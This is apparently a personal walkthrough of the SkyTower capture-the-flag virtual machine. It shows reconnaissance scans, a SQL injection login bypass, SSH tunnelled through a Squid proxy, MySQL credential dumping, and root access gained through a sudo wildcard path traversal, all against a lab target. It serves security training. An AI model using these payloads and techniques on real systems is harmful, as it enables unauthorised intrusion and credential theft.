Looking for the box first:
nmap -Pn -T4 192.168.1.0/24
Nmap scan report for SkyTower.lan (192.168.1.188)
Host is up (0.00042s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
3128/tcp open squid-http
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
So let’s run a more intense scan while I check the website:
nmap -p- -sV 192.168.1.188
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-29 14:29 UTC
Nmap scan report for SkyTower.lan (192.168.1.188)
Host is up (0.00044s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.22 ((Debian))
3128/tcp open http-proxy Squid http proxy 3.1.20
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.71 seconds
So let’s go to the website:
The one on 3128 is showing an error message:
Nikto doesn’t reveal a lot:
nikto -h http://192.168.1.188
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.1.188
+ Target Hostname: 192.168.1.188
+ Target Port: 80
+ Start Time: 2019-08-29 14:33:26 (GMT0)
—————————————————————————
+ Server: Apache/2.2.22 (Debian)
+ Server may leak inodes via ETags, header found with file /, inode: 87, size: 1136, mtime: Fri Jun 20 11:23:36 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for ‘index’ were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ Retrieved x-powered-by header: PHP/5.4.4-14+deb7u9
+ OSVDB-3233: /icons/README: Apache default file found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 10 item(s) reported on remote host
+ End Time: 2019-08-29 14:44:30 (GMT0) (664 seconds)
—————————————————————————
I also checked exploitdb for squid but nothing really interesting there.
GOBUSTER did<nt find much either:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.188
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.188
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/08/30 20:03:24 Starting gobuster
===============================================================
/index (Status: 200)
/background (Status: 200)
/background2 (Status: 200)
/server-status (Status: 403)
===============================================================
2019/08/30 20:04:50 Finished
Nothing in the images:
root@kali:~/boxes/skytower# /root/tools/stegextract/stegextract background.jpeg
Detected image format: JPG
No trailing data found in file
Performing deep analysis
Done
root@kali:~/boxes/skytower# /root/tools/stegextract/stegextract background2.jpeg
Detected image format: JPG
No trailing data found in file
Performing deep analysis
Done
Cheking the login page with BURP:
POST /login.php HTTP/1.1
Host: 192.168.1.188
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.188/
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
Connection: close
Upgrade-Insecure-Requests: 1
email=’*&password=’*
Yep, SQL injection works!
HTTP/1.1 200 OK
Date: Thu, 29 Aug 2019 19:27:42 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u9
Vary: Accept-Encoding
Content-Length: 1626
Connection: close
Content-Type: text/html
<HTML>
<div style=”height:100%; width:100%;background-image:url(‘background.jpg’);
background-size:100%;
background-position:50% 50%;
background-repeat:no-repeat;”>
<div style=”
padding-right:8px;
padding-left:10px;
padding-top: 10px;
padding-bottom: 10px;
background-color:white;
border-color: #000000;
border-width: 5px;
border-style: solid;
width: 400px;
height:430px;
position:absolute;
top:50%;
left:50%;
margin-top:-215px; /* this is half the height of your div*/
margin-left:-200px;
“>
<br><strong><font size=4>Welcome john@skytech.com</font><br /> </br></strong>As you may know, SkyTech has ceased all international operations.<br><br> To all our long term employees, we wish to convey our thanks for your dedication and hard work.<br><br><strong>Unfortunately, all international contracts, including yours have been terminated.</strong><br><br> The remainder of your contract and retirement fund, <strong>$2</strong> ,has been payed out in full to a secure account. For security reasons, you must login to the SkyTech server via SSH to access the account details.<br><br><strong>Username: john</strong><br><strong>Password: hereisjohn</strong> <br><br> We wish you the best of luck in your future endeavors. <br> </div> </div></HTML>
Good info:
Username: john
Password: hereisjohn
So let’s try with ssh — Oh crap… I can’t… ssh is filtered!
So maybe I can connect using SQUID…
proxytunnel -p 192.168.1.188:3128 -d 127.0.0.1:22 -a 4444
Then open a new terminal and:
ssh john@127.0.0.1 -p 4444 “/bin/bash”
BINGO
ssh john@127.0.0.1 -p 4444 “/bin/bash”
john@127.0.0.1’s password:
id
uid=1000(john) gid=1000(john) groups=1000(john)
fg
/bin/sh: 3: fg: No current job
is
/bin/sh: 4: is: not found
ls
whoami
john
id
uid=1000(john) gid=1000(john) groups=1000(john)
Shell is not very good but let’s try to move forward…
Checking home:
ls -al
total 20
drwxr-xr-x 5 root root 4096 Jun 20 2014 .
drwxr-xr-x 24 root root 4096 Jun 20 2014 ..
drwx—— 2 john john 4096 Jun 20 2014 john
drwx—— 2 sara sara 4096 Jun 20 2014 sara
drwx—— 2 william william 4096 Jun 20 2014 william
Nothing… so let’s check the website:
cd /var/www
ls -al
total 5300
drwxr-xr-x 2 root root 4096 Jun 20 2014 .
drwxr-xr-x 12 root root 4096 Jun 20 2014 ..
-rwxr–r– 1 root root 2831446 Jun 20 2014 background2.jpg
-rwxr–r– 1 root root 2572609 Jun 20 2014 background.jpg
-rwxr–r– 1 root root 1136 Jun 20 2014 index.html
-rwxr–r– 1 root root 2393 Jun 20 2014 login.php
cat login.php
<?php
$db = new mysqli(‘localhost’, ‘root’, ‘root’, ‘SkyTech’);
BINGO:
OK pissed with this crappy shell…
/bin/sh -i
/bin/sh: 0: can’t access tty; job control turned off
$ id
uid=1000(john) gid=1000(john) groups=1000(john)
$
ok now we’re talking!!!!!
So I uploaded an ran lienum..
[-] Specific release information:
PRETTY_NAME=”Debian GNU/Linux 7 (wheezy)”
NAME=”Debian GNU/Linux”
VERSION_ID=”7″
VERSION=”7 (wheezy)”
ID=debian
ANSI_COLOR=”1;31″
HOME_URL=”http://www.debian.org/”
SUPPORT_URL=”http://www.debian.org/support/”
BUG_REPORT_URL=”http://bugs.debian.org/”
Kinda strange to see that mysql is not runnig:
-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 10648 812 ? Ss 17:29 0:00 init [2]
root 2 0.0 0.0 0 0 ? S 17:29 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 17:29 0:00 [ksoftirqd/0]
root 6 0.0 0.0 0 0 ? S 17:29 0:00 [migration/0]
root 7 0.0 0.0 0 0 ? S 17:29 0:00 [watchdog/0]
root 8 0.0 0.0 0 0 ? S< 17:29 0:00 [cpuset]
root 9 0.0 0.0 0 0 ? S< 17:29 0:00 [khelper]
root 10 0.0 0.0 0 0 ? S 17:29 0:00 [kdevtmpfs]
root 11 0.0 0.0 0 0 ? S< 17:29 0:00 [netns]
root 12 0.0 0.0 0 0 ? S 17:29 0:00 [sync_supers]
root 13 0.0 0.0 0 0 ? S 17:29 0:00 [bdi-default]
root 14 0.0 0.0 0 0 ? S< 17:29 0:00 [kintegrityd]
root 15 0.0 0.0 0 0 ? S< 17:29 0:00 [kblockd]
root 17 0.0 0.0 0 0 ? S 17:29 0:00 [khungtaskd]
root 18 0.0 0.0 0 0 ? S 17:29 0:00 [kswapd0]
root 19 0.0 0.0 0 0 ? SN 17:29 0:00 [ksmd]
root 20 0.0 0.0 0 0 ? S 17:29 0:00 [fsnotify_mark]
root 21 0.0 0.0 0 0 ? S< 17:29 0:00 [crypto]
root 98 0.0 0.0 0 0 ? S< 17:29 0:00 [ata_sff]
root 103 0.0 0.0 0 0 ? S 17:29 0:00 [khubd]
root 118 0.0 0.0 0 0 ? S 17:29 0:00 [scsi_eh_0]
root 119 0.0 0.0 0 0 ? S 17:29 0:00 [scsi_eh_1]
root 120 0.0 0.0 0 0 ? S 17:29 0:00 [kworker/u:1]
root 121 0.0 0.0 0 0 ? S 17:29 0:00 [scsi_eh_2]
root 122 0.0 0.0 0 0 ? S 17:29 0:00 [kworker/u:2]
root 126 0.0 0.0 0 0 ? S 17:29 0:00 [kworker/0:2]
root 153 0.0 0.0 0 0 ? S 17:29 0:00 [jbd2/sda1-8]
root 154 0.0 0.0 0 0 ? S< 17:29 0:00 [ext4-dio-unwrit]
root 297 0.0 0.2 21380 1356 ? Ss 17:29 0:00 udevd –daemon
root 396 0.0 0.2 21376 1052 ? S 17:29 0:00 udevd –daemon
root 397 0.0 0.1 21376 1008 ? S 17:29 0:00 udevd –daemon
root 415 0.0 0.0 0 0 ? S< 17:29 0:00 [kpsmoused]
root 417 0.0 0.0 0 0 ? S 17:29 0:00 [kworker/0:3]
root 1697 0.0 0.0 0 0 ? S 17:29 0:00 [flush-8:0]
root 1819 0.0 0.3 52776 1532 ? Sl 17:29 0:00 /usr/sbin/rsyslogd -c5
root 1853 0.0 0.1 4116 636 ? Ss 17:29 0:00 /usr/sbin/acpid
root 1889 0.0 1.8 154280 9464 ? Ss 17:29 0:00 /usr/sbin/apache2 -k start
root 1932 0.0 0.2 20408 1040 ? Ss 17:29 0:00 /usr/sbin/cron
www-data 1964 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
www-data 1965 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
www-data 1966 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
www-data 1967 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
www-data 1968 0.0 1.1 154304 5944 ? S 17:29 0:00 /usr/sbin/apache2 -k start
root 2015 0.0 0.5 49956 2912 ? Ss 17:29 0:00 /usr/sbin/squid3 -YC -f /etc/squid3/squid.conf
root 2090 0.0 0.1 16256 944 tty1 Ss+ 17:29 0:00 /sbin/getty 38400 tty1
root 2091 0.0 0.1 16256 944 tty2 Ss+ 17:29 0:00 /sbin/getty 38400 tty2
root 2092 0.0 0.1 16256 940 tty3 Ss+ 17:29 0:00 /sbin/getty 38400 tty3
root 2093 0.0 0.1 16256 940 tty4 Ss+ 17:29 0:00 /sbin/getty 38400 tty4
root 2094 0.0 0.1 16256 948 tty5 Ss+ 17:29 0:00 /sbin/getty 38400 tty5
root 2095 0.0 0.1 16256 944 tty6 Ss+ 17:29 0:00 /sbin/getty 38400 tty6
root 2106 0.0 0.5 9960 2576 ? Ss 17:30 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
root 2147 0.0 0.2 49932 1212 ? Ss 17:30 0:00 /usr/sbin/sshd
proxy 2174 0.0 3.2 86988 16288 ? S 17:48 0:00 (squid) -YC -f /etc/squid3/squid.conf
proxy 2175 0.0 0.2 20100 1052 ? S 17:48 0:00 (unlinkd)
root 2176 0.0 0.6 69216 3508 ? Ss 17:48 0:00 sshd: john [priv]
john 2178 0.0 0.3 69216 1720 ? S 17:48 0:00 sshd: john@notty
john 2179 0.0 0.2 10752 1360 ? Ss 17:48 0:00 /bin/bash
john 2194 0.0 0.1 4180 640 ? S 17:56 0:00 /bin/sh -i
root 2204 0.0 0.0 0 0 ? S 18:00 0:00 [kworker/0:0]
john 2215 0.0 0.3 11332 1992 ? S 18:04 0:00 /bin/bash ./linenum.sh -t
john 2216 0.1 0.2 11356 1508 ? S 18:04 0:00 /bin/bash ./linenum.sh -t
john 2217 0.0 0.1 5596 652 ? S 18:04 0:00 tee -a
john 2439 0.0 0.2 11356 1212 ? S 18:04 0:00 /bin/bash ./linenum.sh -t
john 2440 0.0 0.2 16836 1268 ? R 18:04 0:00 ps aux
### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
[-] SGID files:
-rwxr-sr-x 1 root shadow 54904 May 25 2012 /usr/bin/chage
-rwxr-sr-x 1 root tty 14624 Jun 11 2012 /usr/bin/bsd-write
-rwxr-sr-x 1 root tty 23056 Dec 11 2012 /usr/bin/wall
-rwxr-sr-x 1 root ssh 129088 Apr 2 2014 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 23312 May 25 2012 /usr/bin/expiry
-rwxr-sr-x 1 root crontab 35880 Jul 3 2012 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 35408 Apr 29 2012 /sbin/unix_chkpwd
TROLL:
$ cat /etc/issue
Welcome to the SkyTower, try to gain access
to the flag.txt file in the /root/ directory
OK.. going nowhere for now and no TTY so it’s painfull…
Let’s try to fix this:
ssh -t john@127.0.0.1 -p 4444 “/bin/sh”
Yeah… better!!!
But there’s something still wrong…
So let’s check the login process:
.bashrc has an exit statement.. so I deleted the file… and logged in again….
better! Now I have a real TTY..
Going back to mysql with the credentails I found (root/root)
mysql> select * from login;
+—-+———————+————–+
| id | email | password |
+—-+———————+————–+
| 1 | john@skytech.com | hereisjohn |
| 2 | sara@skytech.com | ihatethisjob |
| 3 | william@skytech.com | senseable
Trying to log in as sara and removing .bashrc in the same time in case of:
john@SkyTower:~$ ssh sara@localhost “rm .bashrc”
The authenticity of host ‘localhost (::1)’ can’t be established.
ECDSA key fingerprint is f6:3b:95:46:6e:a7:0f:72:1a:67:9e:9b:8a:48:5e:3d.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/john/.ssh/known_hosts).
sara@localhost’s password:
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
sudo -l
Matching Defaults entries for sara on this host:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sara may run the following commands on this host:
(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
sara@SkyTower:~$ sudo ls /accounts/../root
flag.txt
sara@SkyTower:~$ sudo cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
Then…easy:
su –
Password:
root@SkyTower:~# whoami
root
This one was not like the other machine….. I found it tricky!!!!!!!!